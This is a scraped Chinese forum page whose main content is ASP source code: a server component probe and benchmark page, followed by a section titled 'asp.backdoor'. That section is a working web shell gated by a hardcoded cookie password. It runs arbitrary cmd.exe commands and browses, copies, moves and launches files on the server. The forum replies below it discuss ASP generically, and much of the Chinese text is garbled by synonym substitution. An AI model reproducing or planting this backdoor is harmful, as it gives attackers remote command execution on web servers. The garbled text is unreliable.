Response.Write"<fontclass=fonts><b>√</b></font><atitle="&ObjTotest(i,3)&">"&left(ObjTotest(i,3),11)&"</a>"
EndIf%></td>
</tr>
<%next%>
</table>
<br>■罕见的文件上传和办理组件
<tableborder="1"cellpadding="0"cellspacing="0"style="border-collapse:collapse"bordercolor="#3F8805"width="450">
<trheight=18class=backsalign=center><tdwidth=320>组件名称</td><tdwidth=130>撑持及版本</td></tr>
<%Fori=11to15%>
<trheight="18"class=backq>
<tdalign=left><%=ObjTotest(i,0)&"<fontcolor=#888888>"&ObjTotest(i,1)%></font></td>
<tdalign=left><%
IfNotObjTotest(i,2)Then
Response.Write"<fontcolor=red><b>×</b></font>"
Else
Response.Write"<fontclass=fonts><b>√</b></font><atitle="&ObjTotest(i,3)&">"&left(ObjTotest(i,3),11)&"</a>"
EndIf%></td>
</tr>
<%next%>
</table>
<br>■罕见的收发邮件组件
<tableborder="1"cellpadding="0"cellspacing="0"style="border-collapse:collapse"bordercolor="#3F8805"width="450">
<trheight=18class=backsalign=center><tdwidth=320>组件名称</td><tdwidth=130>撑持及版本</td></tr>
<%Fori=16to23%>
<trheight="18"class=backq>
<tdalign=left><%=ObjTotest(i,0)&"<fontcolor=#888888>"&ObjTotest(i,1)%></font></td>
<tdalign=left><%
IfNotObjTotest(i,2)Then
Response.Write"<fontcolor=red><b>×</b></font>"
Else
Response.Write"<fontclass=fonts><b>√</b></font><atitle="&ObjTotest(i,3)&">"&left(ObjTotest(i,3),11)&"</a>"
EndIf%></td>
</tr>
<%next%>
</table>
<br>■图象处置组件
<tableborder="1"cellpadding="0"cellspacing="0"style="border-collapse:collapse"bordercolor="#3F8805"width="450">
<trheight=18class=backsalign=center><tdwidth=320>组件名称</td><tdwidth=130>撑持及版本</td></tr>
<%Fori=24to25%>
<trheight="18"class=backq>
<tdalign=left><%=ObjTotest(i,0)&"<fontcolor=#888888>"&ObjTotest(i,1)%></font></td>
<tdalign=left><%
IfNotObjTotest(i,2)Then
Response.Write"<fontcolor=red><b>×</b></font>"
Else
Response.Write"<fontclass=fonts><b>√</b></font><atitle="&ObjTotest(i,3)&">"&left(ObjTotest(i,3),11)&"</a>"
EndIf%></td>
</tr>
<%next%>
</table>
<br>
<fontclass=fonts>其他组件撑持情形检测</font><br>
鄙人面的输出框中输出你要检测的组件的ProgId或ClassId。
<tableborder="1"cellpadding="0"cellspacing="0"style="border-collapse:collapse"bordercolor="#3F8805"width="450">
<FORMaction=<%=rseb%>?q=test.aspmethod=postid=form1name=form1>
<trheight="18"class=backq>
<tdalign=centerheight=30><inputclass=inputtype=textvalue=""name="classname"size=40>
<INPUTtype=submitvalue="确定"class=backcid=submit1name=submit1>
<INPUTtype=resetvalue="重填"class=backcid=reset1name=reset1>
</td>
</tr>
</FORM>
</table>
<br>
<fontclass=fonts>ASP剧本注释和运算速率测试</font><br>
<%
感激网际同砚录<ahref=http://www.5719.nettarget=_blank>http://www.5719.net</a>保举利用timer函数
由于只举行50万次盘算,以是往失落了是不是检测的选项而间接检测
Response.Write"整数运算测试,正在举行50万次加法运算..."
dimt1,t2,lsabc,thetime,thetime2
t1=timer
fori=1to500000
lsabc=1+1
next
t2=timer
thetime=cstr(int(((t2-t1)*10000)+0.5)/10)
Response.Write"...已完成!<fontcolor=red>"&thetime&"毫秒</font>。<br>"

Response.Write"浮点运算测试,正在举行20万次开方运算..."
t1=timer
fori=1to200000
lsabc=2^0.5
next
t2=timer
thetime2=cstr(int(((t2-t1)*10000)+0.5)/10)
Response.Write"...已完成!<fontcolor=red>"&thetime2&"毫秒</font>。<br>"
%>
<tableclass=backqborder="1"cellpadding="0"cellspacing="0"style="border-collapse:collapse"bordercolor="#3F8805"width="450">
<trheight=18align=center>
<tdwidth=320rowspan=2>供对照的服务器</td>
<tdwidth=130colspan=2>完成工夫(毫秒)</td>
</tr>
<trheight=18align=center>
<tdwidth=65>整数运算</td><tdwidth=65>浮点运算</td>
</tr>
<trheight=18>
<tdalign=left><ahref="<ahref=http://www.ajiang.nettarget=_blank>http://www.ajiang.net</a>">阿江的团体主机(DDR512M赛扬1.7G,测1次)</a></td><td>250</td><td>234</td>
</tr>
<trheight=18>
<tdalign=left><ahref="<ahref=http://www.100u.com?come=aspcheck&keyword=target=_blank>http://www.100u.com?come=aspcheck&keyword=</a>假造主机"target="_blank">百优科技100u主机(2003-06-12,测10次,最年夜值)</a></td><td>187</td><td>156</td>
</tr>
<trheight=18>
<tdalign=left><ahref="<ahref=http://www.west263.com/index.asp?ads=ajiangtarget=_blank>http://www.west263.com/index.asp?ads=ajiang</a>">西部数码west263主机(2003-06-12,测10次,最年夜值)</a></td><td>187</td><td>177</td>
</tr>
<trheight=18>
<tdalign=left><ahref="<ahref=http://www.linkwww.comtarget=_blank>http://www.linkwww.com</a>">联网科技linkwww主机(2003-06-13,测10次,最年夜值)</a></td><td>187</td><td>171</td>
</tr>
<trheight=18>
<tdalign=left><fontcolor=red>您正在利用的这台服务器</font></td><td><fontcolor=red><%=thetime%></font></td><td><fontcolor=red><%=thetime2%></font></td>
</tr>
</table>
</BODY>
</HTML>
<%case"p.asp"%>
<%ifRequest.Cookies("password")="7758521"then%>
<%response.write"<fontclass=fonts>注重:每次只能实行一个操纵</font>"%>
以后工夫:<%response.writenow()%><BR>程序地点的物理路径:
<%response.writerequest.servervariables("APPL_PHYSICAL_PATH")%>
<html>
<title>asp.backdoor</title>
<style>
<!--
table{font-family:宋体;font-size:9pt}
BODY
{
FONT-FAMILY:宋体;
FONT-SIZE:9pt
}
TD
{
FONT-SIZE:9pt
}
.input
{
BORDER:#1111111pxsolid;
FONT-SIZE:9pt;
BACKGROUND-color:#F8FFF0
}
.backs
{
BACKGROUND-COLOR:#3F8805;
COLOR:#ffffff;
}
.backq
{
BACKGROUND-COLOR:#EEFEE0
}
.backc
{
BACKGROUND-COLOR:#3F8805;
BORDER:mediumnone;
COLOR:#ffffff;
HEIGHT:18px;
font-size:9pt
}
.fonts
{
COLOR:#3F8805
}
-->
</STYLE>
<bodybgcolor="#C0C0C0"text="#000000">
<tableborder=0width=500cellspacing=0cellpadding=0class="noborder"><trbgcolor="#EEEEEE"height=18class="noborder"style=table-layout:fixed;word-break:break-all><tdalign=left>
<formaction="<%=Request.ServerVariables("URL")%>?q=p.asp"method="post">
<inputtype=textname=textvalue="<%=DSnXA%>"><fontclass=fonts>输出要扫瞄的目次,最初要加</font></td></tr><trbgcolor="#EEEEEE"height=18class="noborder"><tdalign=left>
<inputtype=textname=text1value="<%=DSnXA1%>">
copy
<inputtype=textname=text2value="<%=DSnXA2%>"><fontclass=fonts>目标地点不要带文件名</font></td></tr><trbgcolor="#EEEEEE"height=18class="noborder"><tdalign=left>
<inputtype=textname=text3value="<%=DSnXA3%>">
move
<inputtype=textname=text4value="<%=DSnXA4%>"><fontclass=fonts>目标地点不要带文件名</font></td></tr><trbgcolor="#EEEEEE"height=18class="noborder"><tdalign=left>
路径:<inputtype=textname=text5value="<%=DSnXA5%>">
程序:<inputtype=textname=text6value="<%=DSnXA6%>"><fontclass=fonts>不成以加参数</font></td></tr><trbgcolor="#EEEEEE"height=18class="noborder"><tdalign=left><inputtype="text"name="ok"size=55><fontclass=fonts>CMD命令对话框</font>
</td></tr><trbgcolor="#EEEEEE"height=18class="noborder"><tdalign=left><inputtype=textname=pathlcxsize=55><fontclass=fonts>路径与文件名</font></td><tr/>
<trbgcolor="#EEEEEE"height=18class="noborder"><tdalign=left>
<textareacols=80rows=5name=textlcx>
<objectrunat=serverid=oScriptscope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%ok=Request("ok")
ifok<>""thenresponse.writeoScript.exec("cmd.exe/c"&ok).stdout.readall
%></textarea>
<inputtype=submitname=sbvalue=命令class=input>
</form></td></tr>
</table>
</center>
<%
Response.Writerequest.form("cmd")&"<br><br>"
Response.WritestrResult
DSnXA=Request.Form("text")目次扫瞄
if(DSnXA<>"")then
setshell=server.createobject("shell.application")创建shell工具
setfod1=shell.namespace(DSnXA)
setfoditems=fod1.items
foreachcoinfoditems
response.write"<fontcolor=black>"&co.path&"-----"&co.size&"</font><br>"
next
endif
DSnXA1=Request.Form("text1")目次拷贝,不克不及举行文件拷贝
DSnXA2=Request.Form("text2")
ifDSnXA1<>""andDSnXA2<>""then
setshell1=server.createobject("shell.application")创建shell工具
setfod1=shell1.namespace(DSnXA2)
fori=len(DSnXA1)to1step-1
ifmid(DSnXA1,i,1)=""then
path=left(DSnXA1,i-1)
exitfor
endif
next
iflen(path)=2thenpath=path&""
path2=right(DSnXA1,len(DSnXA1)-i)
setfod2=shell1.namespace(path)
setfoditem=fod2.parsename(path2)
fod1.copyherefoditem
response.write"commandcompletedsuccess!"
endif
DSnXA3=Request.Form("text3")目次挪动
DSnXA4=Request.Form("text4")
ifDSnXA3<>""andDSnXA4<>""then
setshell2=server.createobject("shell.application")创建shell工具
setfod1=shell2.namespace(DSnXA4)
fori=len(DSnXA3)to1step-1
ifmid(DSnXA3,i,1)=""then
path=left(DSnXA3,i-1)
exitfor
endif
next
iflen(path)=2thenpath=path&""
path2=right(DSnXA3,len(DSnXA3)-i)
setfod2=shell2.namespace(path)
setfoditem=fod2.parsename(path2)
fod1.moveherefoditem
response.write"commandcompletedsuccess!"
endif
DSnXA5=Request.Form("text5")实行程序要指定路径
DSnXA6=Request.Form("text6")
ifDSnXA5<>""andDSnXA6<>""then
setshell3=server.createobject("shell.application")创建shell工具
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write"commandcompletedsuccess!"
endif
endif
%>
</body>
<%
endselect
functionEpass(pass)
temppass=StrReverse(left(pass&"zxcvbnm,./",10))
templen=len(pass)
mmpassword=""
forj=1to10
mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1))
next
Epass=replace(mmpassword,"","B")
endfunction
%>
asp,你就只能等着微软给你解决,它不乐意你就只好悲催。而且asp跑在windows服务器上,windows服务器跟linux比起来简直弱爆了!
小魔女 该用户已被删除
沙发
发表于 2015-1-20 18:25:29 | 只看该作者
以HTML语言整合(HTML负责界面上,ASP则负责功能上)形成一个B/S(浏览器/服务器)模式的网页程序。
飘灵儿 该用户已被删除
板凳
发表于 2015-1-29 14:20:32 | 只看该作者
作为IE上广为流传的动态网页开发技术,ASP以它简单易学博得了广大WEB程序爱好这的青睐,而且它对运行环境和开发品台的不挑剔,以及有大量有效的参考手册,极大的推广了它的发展。
海妖 该用户已被删除
地板
发表于 2015-2-6 02:01:54 | 只看该作者
从事这个行业,那么你可以学ASP语言,简单快速上手,熟练dreamweav排版,写asp代码,熟练photoshop处理图片,打好基础就行了
简单生活 该用户已被删除
5#
发表于 2015-2-14 23:49:32 | 只看该作者
我就感觉到ASP和一些常用的数据库编程以及软件工程方面的思想是非常重要的。我现在也在尝试自己做网页,这其中就用到了ASP,我想它的作用是可想而知的。
蒙在股里 该用户已被删除
6#
发表于 2015-3-4 10:47:44 | 只看该作者
它可通过内置的组件实现更强大的功能,如使用A-DO可以轻松地访问数据库。
活着的死人 该用户已被删除
7#
发表于 2015-3-11 18:32:16 | 只看该作者
跟学别的语言一样,先掌握变量,流程控制语句(就是ifwhileselect)等,函数/过程,数组
爱飞 该用户已被删除
8#
发表于 2015-3-19 07:45:34 | 只看该作者
ASP(ActiveServerPages)是Microsfot公司1996年11月推出的WEB应用程序开发技术,它既不是一种程序语言,也不是一种开发工具,而是一种技术框架,不须使用微软的产品就能编写它的代码,能产生和执行动态、交互式、高效率的站占服务器的应用程序。
若相依 该用户已被删除
9#
发表于 2015-3-27 15:08:37 | 只看该作者
他的语法和设计思路和VB完全相同,导致很多ASP的书都留一句“相关内容请参考VB的相关教材....”更糟糕的是,相当多的ASP教程混合了Javascript,VBscript等等脚本语言,搞的初学者。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-5-15 11:02

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表